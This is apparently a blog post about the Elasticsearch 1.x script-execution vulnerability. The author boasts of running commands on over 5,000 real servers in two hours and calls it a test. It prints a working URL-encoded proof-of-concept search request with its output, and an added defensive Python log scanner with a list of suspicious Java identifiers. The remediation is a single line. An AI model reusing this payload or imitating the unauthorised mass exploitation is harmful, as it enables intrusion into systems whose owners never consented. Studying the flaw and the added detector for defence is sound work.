A 25,000-Linux-cluster crisis? How I assembled a botnet of 5,000+ cluster servers in 2 hours
Because of the Elasticsearch command-execution vulnerability, tens of thousands of servers are affected; in the screenshot no IP appears twice. Within 2 hours, the relevant commands were successfully executed on more than 5,000 servers.
This was only a technical test of the vulnerability's reach; the title is clickbait. Of 700 cluster servers tested in China, more than 170 succeeded. Across all tests only 14,000 IPs were tried, with a success rate close to 50%. Proof of the vulnerability:
Run the PoC: http://xx.xx.xx.xx:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22String%20str%3DSystem.getProperty(\%22os.name\%22)%2b\%22-\%22%2bSystem.getProperty(\%22user.name\%22);\%22[os:\%22%2bstr.toString()%2b\%22/]\%22;%22}}}
The result is as follows:
{"took":7,"timed_out":false,"_shards":{"total":5,"successful":5,"failed":0},"hits":{"total":140847,"max_score":1.0,"hits":[{"_index":"cai","_type":"loganalysis","_id":"f2bb7c30-ab55-11e3-9940-22000a9a8b23","_score":1.0,"fields":{"exp":"[os:Linux-ec2-user/]"}}]}}
This returns the operating system type and the username under which Elasticsearch is running.
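A defender-side check for the request pattern shown above, added here as an example (not code from the original post): it decodes the source parameter of _search requests found in an access log from a reverse proxy in front of port 9200 (the nginx-style log lines are constructed, the second one reusing the PoC path above) and flags any query body that carries a script_fields inline script, listing the Java identifiers the script references.

```python
"""Flag Elasticsearch 1.x _search requests whose 'source' parameter carries an
inline script (the PoC pattern above). Added example, not the original post's code;
assumes nginx-style access logs from a reverse proxy in front of port 9200."""
import json
import re
from urllib.parse import unquote

# Java identifiers a search-time script has no business referencing.
SUSPICIOUS_TOKENS = ("System.getProperty", "Runtime", "ProcessBuilder", "java.io", "java.lang")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def extract_scripts(obj):
    """Recursively collect every string stored under a 'script' key (ES 1.x layout)."""
    if isinstance(obj, dict):
        own = [v for k, v in obj.items() if k == "script" and isinstance(v, str)]
        return own + [s for v in obj.values() for s in extract_scripts(v)]
    if isinstance(obj, list):
        return [s for v in obj for s in extract_scripts(v)]
    return []

def inspect_path(path):
    """Return (has_inline_script, sorted suspicious tokens) for one request path."""
    route, _, query = path.partition("?")
    if not route.endswith("/_search") or not query:
        return False, []
    # Split on '&' only: the script body itself may contain ';' characters.
    params = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
    try:
        body = json.loads(unquote(params["source"]))
    except (KeyError, ValueError):
        return False, []
    scripts = extract_scripts(body)
    hits = sorted({t for s in scripts for t in SUSPICIOUS_TOKENS if t in s})
    return bool(scripts), hits

def scan_log(lines):
    """Return (client_ip, suspicious tokens) for each logged request with an inline script."""
    flagged = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m:
            has_script, hits = inspect_path(m.group(1))
            if has_script:
                flagged.append((line.split()[0], hits))
    return flagged

# Constructed sample: one ordinary query, one request reusing the PoC path from the post.
POC_PATH = r'/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22String%20str%3DSystem.getProperty(\%22os.name\%22)%2b\%22-\%22%2bSystem.getProperty(\%22user.name\%22);\%22[os:\%22%2bstr.toString()%2b\%22/]\%22;%22}}}'
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Mar/2014:10:00:01 +0800] "GET /_search?q=user:kimchy HTTP/1.1" 200 512',
    f'10.0.0.9 - - [18/Mar/2014:10:00:07 +0800] "GET {POC_PATH} HTTP/1.1" 200 431',
]
```

Running scan_log(SAMPLE_LOG) reports only the second client, with System.getProperty as the referenced identifier; a script that merely reads document fields is still reported as an inline script but with an empty token list.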
Affected IPs in China: (list of address / OS / username entries omitted)
Remediation:
Restrict access by IP